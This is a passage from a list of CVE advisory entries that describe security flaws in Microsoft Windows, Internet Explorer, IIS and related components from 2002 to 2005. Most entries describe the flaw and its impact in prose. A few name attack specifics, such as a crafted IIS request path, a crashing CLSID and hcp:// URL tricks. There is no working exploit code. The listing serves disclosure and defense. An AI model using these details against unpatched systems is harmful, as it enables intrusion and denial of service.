long src attribute. [CVE-2005-4717] Microsoft Internet Explorer 6.0 on Windows NT 4.0 SP6a, Windows 2000 SP4, Windows XP SP1, Windows XP SP2, and Windows Server 2003 SP1 allows remote attackers to cause a denial of service (client crash) via a certain combination of a malformed HTML file and a CSS file that triggers a null dereference, probably related to rendering of a DIV element that contains a malformed IMG tag, as demonstrated by IEcrash.htm and IEcrash.rar. [CVE-2005-4560] The Windows Graphical Device Interface library (GDI32.DLL) in Microsoft Windows allows remote attackers to execute arbitrary code via a Windows Metafile (WMF) format image with a crafted SETABORTPROC GDI Escape function call, related to the Windows Picture and Fax Viewer (SHIMGVW.DLL), a different vulnerability than CVE-2005-2123 and CVE-2005-2124, and as originally discovered in the wild on unionseek.com. [CVE-2005-4360] The URL parser in Microsoft Internet Information Services (IIS) 5.1 on Windows XP Professional SP2 allows remote attackers to execute arbitrary code via multiple requests to ".dll" followed by arguments such as "~0" through "~9", which causes ntdll.dll to produce a return value that is not correctly handled by IIS, as demonstrated using "/_vti_bin/.dll//~0". NOTE: the consequence was originally believed to be only a denial of service (application crash and reboot). [CVE-2005-4269] mshtml.dll in Microsoft Windows XP, Server 2003, and Internet Explorer 6.0 SP1 allows attackers to cause a denial of service (access violation) by causing mshtml.dll to process button-focus events at the same time that a document is reloading, as seen in Microsoft Office InfoPath 2003 by repeatedly clicking the "Delete" button in a repeating section in a form. NOTE: the normal operation of InfoPath appears to involve a local user without any privilege boundaries, so this might not be a vulnerability in InfoPath. If no realistic scenarios exist for this problem in other products, then perhaps it should be excluded from CVE. [CVE-2005-3981] * DISPUTED NOTE: this issue has been disputed by third parties. Microsoft Windows XP, 2000, and 2003 allows local users to kill a writable process by using the CreateRemoteThread function with certain arguments on a process that has been opened using the OpenProcess function, possibly involving an invalid address for the start routine. NOTE: followup posts have disputed this issue, saying that if a user already has privileges to write to a process, then other functions could be called or the process could be terminated using PROCESS_TERMINATE. [CVE-2005-3945] The SynAttackProtect protection in Microsoft Windows 2003 before SP1 and Windows 2000 before SP4 with Update Roll-up uses a hash of predictable data, which allows remote attackers to cause a denial of service (CPU consumption) via a flood of SYN packets that produce identical hash values, which slows down the hash table lookups. [CVE-2005-3595] By default Microsoft Windows XP Home Edition installs with a blank password for the Administrator account, which allows remote attackers to gain control of the computer. [CVE-2005-3177] CHKDSK in Microsoft Windows 2000 before Update Rollup 1 for SP4, Windows XP, and Windows Server 2003, when running in fix mode, does not properly handle security descriptors if the master file table contains a large number of files or if the descriptors do not satisfy certain NTFS conventions, which could cause ACLs for some files to be reverted to less secure defaults, or cause security descriptors to be removed. [CVE-2005-3176] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not record the IP address of a Windows Terminal Services client in a security log event if the client connects successfully, which could make it easier for attackers to escape detection. [CVE-2005-3175] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows a local administrator to unlock a computer even if it has been locked by a domain administrator, which allows the local administrator to access the session as the domain administrator. [CVE-2005-3174] Microsoft Windows 2000 before Update Rollup 1 for SP4 allows users to log on to the domain, even when their password has expired, if the fully qualified domain name (FQDN) is 8 characters long. [CVE-2005-3173] Microsoft Windows 2000 before Update Rollup 1 for SP4 does not apply group policies if the user logs on using UPN credentials with a trailing dot, which prevents Windows 2000 from finding the correct domain controller and could allow the user to bypass intended restrictions. [CVE-2005-3172] The WideCharToMultiByte function in Microsoft Windows 2000 before Update Rollup 1 for SP4 does not properly convert strings with Japanese composite characters in the last character, which could prevent the string from being null terminated and lead to data corruption or enable buffer overflow attacks. [CVE-2005-3171] Microsoft Windows 2000 before Update Rollup 1 for SP4 records Event ID 1704 to indicate that Group Policy security settings were successfully updated, even when the processing fails such as when Ntuser.pol cannot be accessed, which could cause system administrators to believe that the system is compliant with the specified settings. [CVE-2005-3170] The LDAP client on Microsoft Windows 2000 before Update Rollup 1 for SP4 accepts certificates using LDAP Secure Sockets Layer (LDAPS) even when the Certificate Authority (CA) is not trusted, which could allow attackers to trick users into believing that they are accessing a trusted site. [CVE-2005-3169] Microsoft Windows 2000 before Update Rollup 1 for SP4, when the "audit directory service access" policy is enabled, does not record a 565 event message for File Delete Child operations on an Active Directory object in the security event log, which could allow attackers to conduct unauthorized activities without detection. [CVE-2005-3168] The SECEDIT command on Microsoft Windows 2000 before Update Rollup 1 for SP4, when using a security template to set Access Control Lists (ACLs) on folders, does not apply ACLs on folders that are listed after a long folder entry, which could result in less secure permissions than specified by the template. [CVE-2005-2940] Unquoted Windows search path vulnerability in Microsoft Antispyware 1.0.509 (Beta 1) might allow local users to gain privileges via a malicious "program.exe" file in the C: folder, involving the programs (1) GIANTAntiSpywareMain.exe, (2) gcASNotice.exe, (3) gcasServ.exe, (4) gcasSWUpdater.exe, or (5) GIANTAntiSpywareUpdater.exe. NOTE: it is not clear whether this overlaps CVE-2005-2935. [CVE-2005-2935] Unquoted Windows search path vulnerability in Microsoft AntiSpyware might allow local users to execute code via a malicious c:\program.exe file, which is run by AntiSpywareMain.exe when it attempts to execute gsasDtServ.exe. NOTE: it is not clear whether this overlaps CVE-2005-2940. [CVE-2005-2388] Buffer overflow in a certain USB driver, as used on Microsoft Windows, allows attackers to execute arbitrary code. [CVE-2005-2307] netman.dll in Microsoft Windows Connections Manager Library allows local users to cause a denial of service (Network Connections Service crash) via a large integer argument to a particular function, aka "Network Connection Manager Vulnerability." [CVE-2005-2224] aspnet_wp.exe in Microsoft ASP.NET web services allows remote attackers to cause a denial of service (CPU consumption from infinite loop) via a crafted SOAP message to an RPC/Encoded method. [CVE-2005-2128] QUARTZ.DLL in Microsoft Windows Media Player 9 allows remote attackers to write a null byte to arbitrary memory via an AVI file with a crafted strn element with a modified length value. [CVE-2005-2122] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote attackers to execute arbitrary commands via a shortcut (.lnk) file with long font properties that lead to a buffer overflow in the Client/Server Runtime Server Subsystem (CSRSS), a different vulnerability than CVE-2005-2118. [CVE-2005-2120] Stack-based buffer overflow in the Plug and Play (PnP) service (UMPNPMGR.DLL) in Microsoft Windows 2000 SP4, and XP SP1 and SP2, allows remote or local authenticated attackers to execute arbitrary code via a large number of "\" (backslash) characters in a registry key name, which triggers the overflow in a wsprintfW function call. [CVE-2005-2118] Windows Shell for Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 allows remote user-assisted attackers to execute arbitrary commands via a crafted shortcut (.lnk) file with long font properties that lead to a buffer overflow when the user views the file's properties using Windows Explorer, a different vulnerability than CVE-2005-2122. [CVE-2005-2117] Web View in Windows Explorer on Microsoft Windows 2000 SP4, XP SP1 and SP2, and Server 2003 does not properly handle certain HTML characters in preview fields, which allows remote user-assisted attackers to execute arbitrary code. [CVE-2005-1987] Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. [CVE-2005-1985] The Client Service for NetWare (CSNW) on Microsoft Windows 2000 SP4, XP SP1 and Sp2, and Server 2003 SP1 and earlier, allows remote attackers to execute arbitrary code due to an "unchecked buffer" when processing certain crafted network messages. [CVE-2005-1984] Buffer overflow in the Print Spooler service (Spoolsv.exe) for Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via a malicious message. [CVE-2005-1983] Stack-based buffer overflow in the Plug and Play (PnP) service for Microsoft Windows 2000 and Windows XP Service Pack 1 allows remote attackers to execute arbitrary code via a crafted packet, and local users to gain privileges via a malicious application, as exploited by the Zotob (aka Mytob) worm. [CVE-2005-1982] Unknown vulnerability in the PKINIT Protocol for Microsoft Windows 2000, Windows XP, and Windows Server 2003 could allow a local user to obtain information and spoof a server via a man-in-the-middle (MITM) attack between a client and a domain controller when PKINIT smart card authentication is being used. [CVE-2005-1981] Unknown vulnerability in Microsoft Windows 2000 Server and Windows Server 2003 domain controllers allows remote authenticated users to cause a denial of service (system crash) via a crafted Kerberos message. [CVE-2005-1980] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service hang) via a crafted Transaction Internet Protocol (TIP) message that causes DTC to repeatedly connect to a target IP and port number after an error occurs, aka the "Distributed TIP Vulnerability." [CVE-2005-1979] Distributed Transaction Controller in Microsoft Windows allows remote servers to cause a denial of service (MSDTC service exception and exit) via an "unexpected protocol command during the reconnection request," which is not properly handled by the Transaction Internet Protocol (TIP) functionality. [CVE-2005-1978] COM+ in Microsoft Windows does not properly "create and use memory structures," which allows local users or remote attackers to execute arbitrary code. [CVE-2005-1793] User32.DLL in Microsoft Windows 98SE, and possibly other operating systems, allows local and remote attackers to cause a denial of service (crash) via an icon (.ico) bitmap file with large width and height values. [CVE-2005-1792] Memory leak in Windows Management Instrumentation (WMI) service allows attackers to cause a denial of service (memory consumption and crash) by creating security contexts more quickly than they can be cleared from the RPC cache. [CVE-2005-1219] Buffer overflow in the Microsoft Color Management Module for Windows allows remote attackers to execute arbitrary code via an image with crafted ICC profile format tags. [CVE-2005-1218] The Microsoft Windows kernel in Microsoft Windows 2000 Server, Windows XP, and Windows Server 2003 allows remote attackers to cause a denial of service (crash) via crafted Remote Desktop Protocol (RDP) requests. [CVE-2005-1208] Integer overflow in Microsoft Windows 98, 2000, XP SP2 and earlier, and Server 2003 SP1 and earlier allows remote attackers to execute arbitrary code via a crafted compiled Help (.CHM) file with a large size field that triggers a heap-based buffer overflow, as demonstrated using a "ms-its:" URL in Internet Explorer. [CVE-2005-1207] Buffer overflow in the Web Client service in Microsoft Windows XP and Windows Server 2003 allows remote authenticated users to execute arbitrary code via a crafted WebDAV request containing special parameters. [CVE-2005-1206] Buffer overflow in the Server Message Block (SMB) functionality for Microsoft Windows 2000, XP SP1 and SP2, and Server 2003 and SP1 allows remote attackers to execute arbitrary code via unknown vectors, aka the "Server Message Block Vulnerability." [CVE-2005-1205] The Telnet client for Microsoft Windows XP, Windows Server 2003, and Windows Services for UNIX allows remote attackers to read sensitive environment variables via the NEW-ENVIRON option with a SEND ENV_USERVAR command. [CVE-2005-0852] Microsoft Windows XP SP1 allows local users to cause a denial of service (system crash) via an empty datagram to a raw IP over IP socket (IP protocol 4), as originally demonstrated using code in Python 2.3. [CVE-2005-0771] VERITAS Backup Exec Server (beserver.exe) 9.0 through 10.0 for Windows allows remote unauthenticated attackers to modify the registry by calling methods to the RPC interface on TCP port 6106. [CVE-2005-0551] Stack-based buffer overflow in WINSRV.DLL in the Client Server Runtime System (CSRSS) process of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application that provides console window information with a long FaceName value. [CVE-2005-0550] Buffer overflow in Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to cause a denial of service (i.e., system crash) via a malformed request, aka "Object Management Vulnerability". [CVE-2005-0545] Microsoft Windows XP Pro SP2 and Windows 2000 Server SP4 running Active Directory allow local users to bypass group policies that restrict access to hidden drives by using the browse feature in Office 10 applications such as Word or Excel, or using a flash drive. NOTE: this issue has been disputed in a followup post. [CVE-2005-0063] The document processing application used by the Windows Shell in Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code by modifying the CLSID stored in a file so that it is processed by HTML Application Host (MSHTA), as demonstrated using a Microsoft Word document. [CVE-2005-0061] The kernel of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via certain access requests. [CVE-2005-0060] Buffer overflow in the font processing component of Microsoft Windows 2000, Windows XP SP1 and SP2, and Windows Server 2003 allows local users to gain privileges via a specially-designed application. [CVE-2005-0059] Buffer overflow in the Message Queuing component of Microsoft Windows 2000 and Windows XP SP1 allows remote attackers to execute arbitrary code via a crafted message. [CVE-2005-0058] Buffer overflow in the Telephony Application Programming Interface (TAPI) for Microsoft Windows 98, Windows 98 SE, Windows ME, Windows 2000, Windows XP, and Windows Server 2003 allows attackers elevate privileges or execute arbitrary code via a crafted message. [CVE-2005-0048] Microsoft Windows XP SP2 and earlier, 2000 SP3 and SP4, Server 2003, and older operating systems allows remote attackers to cause a denial of service and possibly execute arbitrary code via crafted IP packets with malformed options, aka the "IP Validation Vulnerability." [CVE-2004-2527] The local and remote desktop login screens in Microsoft Windows XP before SP2 and 2003 allow remote attackers to cause a denial of service (CPU and memory consumption) by repeatedly using the WinKey+"U" key combination, which causes multiple copies of Windows Utility Manager to be loaded more quickly than they can be closed when the copies detect that another instance is running. [CVE-2004-2454] aMSN 0.90 for Microsoft Windows allows local users to obtain sensitive information such as hashed passwords from (1) hotlog.htm and (2) config.xml. [CVE-2004-2365] Memory leak in Microsoft Windows XP and Windows Server 2003 allows local users to cause a denial of service (memory exhaustion) by repeatedly creating and deleting directories using a non-standard tool such as smbmount. [CVE-2004-2339] DISPUTED ** Microsoft Windows 2000, XP, and possibly 2003 allows local users with the SeDebugPrivilege privilege to execute arbitrary code as kernel and read or write kernel memory via the NtSystemDebugControl function, which does not verify its pointer arguments. Note: this issue has been disputed, since Administrator privileges are typically required to exploit this issue, thus privilege boundaries are not crossed. [CVE-2004-2307] Microsoft Internet Explorer 6.0.2600 on Windows XP allows remote attackers to cause a denial of service (browser crash) via a shell: URI with double backslashes (\\) in an HTML tag such as IFRAME or A. [CVE-2004-2291] Microsoft Windows Internet Explorer 5.5 and 6.0 allows remote attackers to execute arbitrary code via an embedded script that uses Shell Helper objects and a shortcut (link) to execute the target script. [CVE-2004-2290] Microsoft Windows XP Explorer allows attackers to execute arbitrary code via a HTML and script in a self-executing folder that references an executable file within the folder, which is automatically executed when a user accesses the folder. [CVE-2004-2289] Microsoft Windows XP Explorer allows local users to execute arbitrary code via a system folder with a Desktop.ini file containing a .ShellClassInfo specifier with a CLSID value that is associated with an executable file. [CVE-2004-2176] The Internet Connection Firewall (ICF) in Microsoft Windows XP SP2 is configured by default to trust sessmgr.exe, which allows local users to use sessmgr.exe to create a local listening port that bypasses the ICF access controls. [CVE-2004-1889] Unknown vulnerability in ftpd in SGI IRIX 6.5.20 through 6.5.23 allows remote attackers to cause a denial of service (hang) via a link failure with Microsoft Windows. [CVE-2004-1325] The getItemInfoByAtom function in the ActiveX control for Microsoft Windows Media Player 9.0 returns a 0 if the file does not exist and the size of the file if the file exists, which allows remote attackers to determine the existence of files on the local system. [CVE-2004-1324] The Microsoft Windows Media Player 9.0 ActiveX control may allow remote attackers to execute arbitrary web script in the Local computer zone via the (1) artist or (2) song fields of a music file, if the file is processed using Internet Explorer. [CVE-2004-1080] The WINS service (wins.exe) on Microsoft Windows NT Server 4.0, Windows 2000 Server, and Windows Server 2003 allows remote attackers to write to arbitrary memory locations and possibly execute arbitrary code via a modified memory pointer in a WINS replication packet to TCP port 42, aka the "Association Context Vulnerability." [CVE-2004-1049] Integer overflow in the LoadImage API of the USER32 Lib for Microsoft Windows allows remote attackers to execute arbitrary code via a .bmp, .cur, .ico or .ani file with a large image size field, which leads to a buffer overflow, aka the "Cursor and Icon Format Handling Vulnerability." [CVE-2004-0901] Microsoft Word for Windows 6.0 Converter (MSWRD632.WPC), as used in WordPad, does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Font Conversion Vulnerability," a different vulnerability than CVE-2004-0571. [CVE-2004-0900] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition does not properly validate the length of certain messages, which allows remote attackers to execute arbitrary code via a malformed DHCP message, aka the "DHCP Request Vulnerability." [CVE-2004-0899] The DHCP Server service for Microsoft Windows NT 4.0 Server and Terminal Server Edition, with DHCP logging enabled, does not properly validate the length of certain messages, which allows remote attackers to cause a denial of service (application crash) via a malformed DHCP message, aka "Logging Vulnerability." [CVE-2004-0897] The Indexing Service for Microsoft Windows XP and Server 2003 does not properly validate the length of a message, which allows remote attackers to execute arbitrary code via a buffer overflow attack. [CVE-2004-0840] The SMTP (Simple Mail Transfer Protocol) component of Microsoft Windows XP 64-bit Edition, Windows Server 2003, Windows Server 2003 64-bit Edition, and the Exchange Routing Engine component of Exchange Server 2003, allows remote attackers to execute arbitrary code via a malicious DNS response message containing length values that are not properly validated. [CVE-2004-0727] Microsoft Internet Explorer 6.0.2800.1106 on Microsoft Windows XP SP2, and other versions including 5.01 and 5.5, allows remote web servers to bypass zone restrictions and execute arbitrary code in the local computer zone by redirecting a function to another function with the same name, as demonstrated by SimilarMethodNameRedir, aka the "Similar Method Name Redirection Cross Domain Vulnerability." [CVE-2004-0726] The Windows Media Player control in Microsoft Windows 2000 allows remote attackers to execute arbitrary script in the local computer zone via an ASX filename that contains javascript, which is executed in the local context in a preview panel. [CVE-2004-0575] Integer overflow in DUNZIP32.DLL for Microsoft Windows XP, Windows XP 64-bit Edition, Windows Server 2003, and Windows Server 2003 64-bit Edition allows remote attackers to execute arbitrary code via compressed (zipped) folders that involve an "unchecked buffer" and improper length validation. [CVE-2004-0574] The Network News Transfer Protocol (NNTP) component of Microsoft Windows NT Server 4.0, Windows 2000 Server, Windows Server 2003, Exchange 2000 Server, and Exchange Server 2003 allows remote attackers to execute arbitrary code via XPAT patterns, possibly related to improper length validation and an "unchecked buffer," leading to off-by-one and heap-based buffer overflows. [CVE-2004-0572] Buffer overflow in the Windows Program Group Converter (grpconv.exe) may allow remote attackers to execute arbitrary code via a shell: URL with a long filename and a .grp extension, which is not properly handled when the shell capability launches grpconv.exe. [CVE-2004-0571] Microsoft Word for Windows 6.0 Converter does not properly validate certain data lengths, which allows remote attackers to execute arbitrary code via a .wri, .rtf, and .doc file sent by email or malicious web site, aka "Table Conversion Vulnerability," a different vulnerability than CVE-2004-0901. [CVE-2004-0540] Microsoft Windows 2000, when running in a domain whose Fully Qualified Domain Name (FQDN) is exactly 8 characters long, does not prevent users with expired passwords from logging on to the domain. [CVE-2004-0503] Microsoft Outlook 2003 allows remote attackers to bypass the default zone restrictions and execute script within media files via a Rich Text Format (RTF) message containing an OLE object for the Windows Media Player, which bypasses Media Player's setting to disallow scripting and may lead to unprompted installation of an executable when exploited in conjunction with predictable-file-location exposures such as CVE-2004-0502. [CVE-2004-0214] Buffer overflow in Microsoft Internet Explorer and Explorer on Windows XP SP1, WIndows 2000, Windows 98, and Windows Me may allow remote malicious servers to cause a denial of service (application crash) and possibly execute arbitrary code via long share names, as demonstrated using Samba. [CVE-2004-0211] The kernel for Microsoft Windows Server 2003 does not reset certain values in CPU data structures, which allows local users to cause a denial of service (system crash) via a malicious program. [CVE-2004-0210] The POSIX component of Microsoft Windows NT and Windows 2000 allows local users to execute arbitrary code via certain parameters, possibly by modifying message length values and causing a buffer overflow. [CVE-2004-0209] Unknown vulnerability in the Graphics Rendering Engine processes of Microsoft Windows 2000, Windows XP, and Windows Server 2003 allows remote attackers to execute arbitrary code via (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats that involve "an unchecked buffer." [CVE-2004-0208] The Virtual DOS Machine (VDM) subsystem of Microsoft Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to access kernel memory and gain privileges via a malicious program that modified some system structures in a way that is not properly validated by privileged operating system functions. [CVE-2004-0207] "Shatter" style vulnerability in the Window Management application programming interface (API) for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows local users to gain privileges by using certain API functions to change properties of privileged programs using the SetWindowLong and SetWIndowLongPtr API functions. [CVE-2004-0206] Network Dynamic Data Exchange (NetDDE) services for Microsoft Windows 98, Windows NT 4.0, Windows 2000, Windows XP, and Windows Server 2003 allows attackers to remotely execute arbitrary code or locally gain privileges via a malicious message or application that involves an "unchecked buffer," possibly a buffer overflow. [CVE-2004-0202] IDirectPlay4 Application Programming Interface (API) of Microsoft DirectPlay 7.0a thru 9.0b, as used in Windows Server 2003 and earlier allows remote attackers to cause a denial of service (application crash) via a malformed packet. [CVE-2004-0201] Heap-based buffer overflow in the HtmlHelp program (hh.exe) in HTML Help for Microsoft Windows 98, Me, NT 4.0, 2000, XP, and Server 2003 allows remote attackers to execute arbitrary commands via a .CHM file with a large length field, a different vulnerability than CVE-2003-1041. [CVE-2004-0199] Help and Support Center in Microsoft Windows XP and Windows Server 2003 SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code, as demonstrated using certain hcp:// URLs that access the DVD Upgrade capability (dvdupgrd.htm). [CVE-2004-0120] The Microsoft Secure Sockets Layer (SSL) library, as used in Windows 2000, Windows XP, and Windows Server 2003, allows remote attackers to cause a denial of service via malformed SSL messages. [CVE-2003-1107] The DHTML capability in Microsoft Windows Media Player (WMP) 6.4, 7.0, 7.1, and 9 may run certain URL commands from a security zone that is less trusted than the current zone, which allows attackers to bypass intended access restrictions. [CVE-2003-1106] The SMTP service in Microsoft Windows 2000 before SP4 allows remote attackers to cause a denial of service (crash or hang) via an e-mail message with a malformed time stamp in the FILETIME attribute. [CVE-2003-0995] Buffer overflow in the Microsoft Message Queue Manager (MSQM) allows remote attackers to cause a denial of service (RPC service crash) via a queue registration request. [CVE-2003-0908] The Utility Manager in Microsoft Windows 2000 executes winhlp32.exe with system privileges, which allows local users to execute arbitrary code via a "Shatter" style attack using a Windows message that accesses the context sensitive help button in the GUI, as demonstrated using the File Open dialog in the Help window, a different vulnerability than CVE-2004-0213. [CVE-2003-0907] Help and Support Center in Microsoft Windows XP SP1 does not properly validate HCP URLs, which allows remote attackers to execute arbitrary code via quotation marks in an hcp:// URL, which are not quoted when constructing the argument list to HelpCtr.exe. [CVE-2003-0906] Buffer overflow in the rendering for (1) Windows Metafile (WMF) or (2) Enhanced Metafile (EMF) image formats in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1 allows remote attackers to execute arbitrary code via a malformed WMF or EMF image. [CVE-2003-0839] Directory traversal vulnerability in the "Shell Folders" capability in Microsoft Windows Server 2003 allows remote attackers to read arbitrary files via .. (dot dot) sequences in a "shell:" link. [CVE-2003-0825] The Windows Internet Naming Service (WINS) for Microsoft Windows Server 2003, and possibly Windows NT and Server 2000, does not properly validate the length of certain packets, which allows attackers to cause a denial of service and possibly execute arbitrary code. [CVE-2003-0818] Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. [CVE-2003-0813] A multi-threaded race condition in the Windows RPC DCOM functionality with the MS03-039 patch installed allows remote attackers to cause a denial of service (crash or reboot) by causing two threads to process the same RPC request, which causes one thread to use memory after it has been freed, a different vulnerability than CVE-2003-0352 (Blaster/Nachi), CVE-2003-0715, and CVE-2003-0528, and as demonstrated by certain exploits against those vulnerabilities. [CVE-2003-0812] Stack-based buffer overflow in a logging function for Windows Workstation Service (WKSSVC.DLL) allows remote attackers to execute arbitrary code via RPC calls that cause long entries to be written to a debug log file ("NetSetup.LOG"), as demonstrated using the NetAddAlternateComputerName API. [CVE-2003-0806] Buffer overflow in the Windows logon process (winlogon) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, and XP SP1, when a member of a domain, allows remote attackers to execute arbitrary code. [CVE-2003-0719] Buffer overflow in the Private Communications Transport (PCT) protocol implementation in the Microsoft SSL library, as used in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via PCT 1.0 handshake packets. [CVE-2003-0662] Buffer overflow in Troubleshooter ActiveX Control (Tshoot.ocx) in Microsoft Windows 2000 SP4 and earlier allows remote attackers to execute arbitrary code via an HTML document with a long argument to the RunQuery2 method. [CVE-2003-0660] The Authenticode capability in Microsoft Windows NT through Server 2003 does not prompt the user to download and install ActiveX controls when the system is low on memory, which could allow remote attackers execute arbitrary code without user approval. [CVE-2003-0605] The RPC DCOM interface in Windows 2000 SP3 and SP4 allows remote attackers to cause a denial of service (crash), and local attackers to use the DoS to hijack the epmapper pipe to gain privileges, via certain messages to the __RemoteGetClassObject interface that cause a NULL pointer to be passed to the PerformScmStage function. [CVE-2003-0604] Windows Media Player (WMP) 7 and 8, as running on Internet Explorer and possibly other Microsoft products that process HTML, allows remote attackers to bypass zone restrictions and access or execute arbitrary files via an IFRAME tag pointing to an ASF file whose Content-location contains a File:// URL. [CVE-2003-0533] Stack-based buffer overflow in certain Active Directory service functions in LSASRV.DLL of the Local Security Authority Subsystem Service (LSASS) in Microsoft Windows NT 4.0 SP6a, 2000 SP2 through SP4, XP SP1, Server 2003, NetMeeting, Windows 98, and Windows ME, allows remote attackers to execute arbitrary code via a packet that causes the DsRolerUpgradeDownlevelServer function to create long debug entries for the DCPROMO.LOG log file, as exploited by the Sasser worm. [CVE-2003-0496] Microsoft SQL Server before Windows 2000 SP4 allows local users to gain privileges as the SQL Server user by calling the xp_fileexist extended stored procedure with a named pipe as an argument instead of a normal file. [CVE-2003-0349] Buffer overflow in the streaming media component for logging multicast requests in the ISAPI for the logging capability of Microsoft Windows Media Services (nsiislog.dll), as installed in IIS 5.0, allows remote attackers to execute arbitrary code via a large POST request to nsiislog.dll. [CVE-2003-0348] A certain Microsoft Windows Media Player 9 Series ActiveX control allows remote attackers to view and manipulate the Media Library on the local system via HTML script. [CVE-2003-0346] Multiple integer overflows in a Microsoft Windows DirectX MIDI library (QUARTZ.DLL) allow remote attackers to execute arbitrary code via a MIDI (.mid) file with (1) large length for a Text or Copyright string, or (2) a large number of tracks, which leads to a heap-based buffer overflow. [CVE-2003-0345] Buffer overflow in the SMB capability for Microsoft Windows XP, 2000, and NT allows remote attackers to cause a denial of service and possibly execute arbitrary code via an SMB packet that specifies a smaller buffer length than is required. [CVE-2003-0228] Directory traversal vulnerability in Microsoft Windows Media Player 7.1 and Windows Media Player for Windows XP allows remote attackers to execute arbitrary code via a skins file with a URL containing hex-encoded backslash characters (%5C) that causes an executable to be placed in an arbitrary location. [CVE-2003-0227] The logging capability for unicast and multicast transmissions in the ISAPI extension for Microsoft Windows Media Services in Microsoft Windows NT 4.0 and 2000, nsiislog.dll, allows remote attackers to cause a denial of service in Internet Information Server (IIS) and execute arbitrary code via a certain network request. [CVE-2003-0111] The ByteCode Verifier component of Microsoft Virtual Machine (VM) build 5.0.3809 and earlier, as used in Windows and Internet Explorer, allows remote attackers to bypass security checks and execute arbitrary code via a malicious Java applet, aka "Flaw in Microsoft VM Could Enable System Compromise." [CVE-2003-0109] Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0. [CVE-2003-0009] Cross-site scripting (XSS) vulnerability in Help and Support Center for Microsoft Windows Me allows remote attackers to execute arbitrary script in the Local Computer security context via an hcp:// URL with the malicious script in the topic parameter. [CVE-2003-0004] Buffer overflow in the Windows Redirector function in Microsoft Windows XP allows local users to execute arbitrary code via a long parameter. [CVE-2002-2283] Microsoft Windows XP with Fast User Switching (FUS) enabled does not remove the "show processes from all users" privilege when the user is removed from the administrator group, which allows that user to view prosesses of other users. [CVE-2002-2117] Microsoft Windows XP allows remote attackers to cause a denial of service (CPU consumption) by flooding UDP port 500 (ISAKMP). [CVE-2002-2105] Microsoft Windows XP allows local users to prevent the system from booting via a corrupt explorer.exe.manifest file. [CVE-2002-2073] Cross-site scripting (XSS) vulnerability in the default ASP pages on Microsoft Site Server 3.0 on Windows NT 4.0 allows remote attackers to inject arbitrary web script or HTML via the (1) ctr parameter in Default.asp and (2) the query string to formslogin.asp. [CVE-2002-1984] Microsoft Internet Explorer 5.0.1 through 6.0 on Windows 2000 or Windows XP allows remote attackers to cause a denial of service (crash) via an OBJECT tag that contains a crafted CLASSID (CLSID) value of "CLSID:00022613-0000-0000-C000-000000000046". [CVE-2002-1933] The terminal services screensaver for Microsoft Windows 2000 does not automatically lock the terminal window if the window is minimized, which could allow local users to gain access to the terminal server window. [CVE-2002-1932] Microsoft Windows XP and Windows 2000, when configured to send administrative alerts and the "Do not overwrite events (clear log manually)" option is set, does not notify the administrator when the log reaches its maximum size, which allows local users and remote attackers to avoid detection. [CVE-2002-1873] Microsoft Exchange 2000, when used with Microsoft Remote Procedure Call (MSRPC), allows remote attackers to cause a denial of service (crash or memory consumption) via malformed MSRPC calls. [CVE-2002-1847] Buffer overflow in mplay32.exe of Microsoft Windows Media Player (WMP) 6.3 through 7.1 allows remote attackers to execute arbitrary commands via a long mp3 filename command line argument. NOTE: since the only known attack vector requires command line access, this may not be a vulnerability. [CVE-2002-1844] Microsoft Windows Media Player (WMP) 6.3, when installed on Solaris, installs executables with world-writable permissions, which allows local users to delete or modify the executables to gain privileges. [CVE-2002-1712] Microsoft Windows 2000 allows remote attackers to cause a denial of service (memory consumption) by sending a flood of empty TCP/IP packets with the ACK and FIN bits set to the NetBIOS port (TCP/139), as demonstrated by stream3. [CVE-2002-1692] Buffer overflow in backup utility of Microsoft Windows 95 allows attackers to execute arbitrary code by causing a filename with a long extension to be placed in a folder to be backed up. [CVE-2002-1670] Microsoft Windows XP Professional upgrade edition overwrites previously installed patches for Internet Explorer 6.0, leaving Internet Explorer unpatched. [CVE-2002-1561] The RPC component in Windows 2000, Windows NT 4.0, and Windows XP allows remote attackers to cause a denial of service (disabled RPC service) via a malformed packet to the RPC Endpoint Mapper at TCP port 135, which triggers a null pointer dereference. [CVE-2002-1327] Buffer overflow in the Windows Shell function in Microsoft Windows XP allows remote attackers to execute arbitrary code via an .MP3 or .WMA audio file with a corrupt custom attribute, aka "Unchecked Buffer in Windows Shell Could Enable System Compromise." [CVE-2002-1256] The SMB signing capability in the Server Message Block 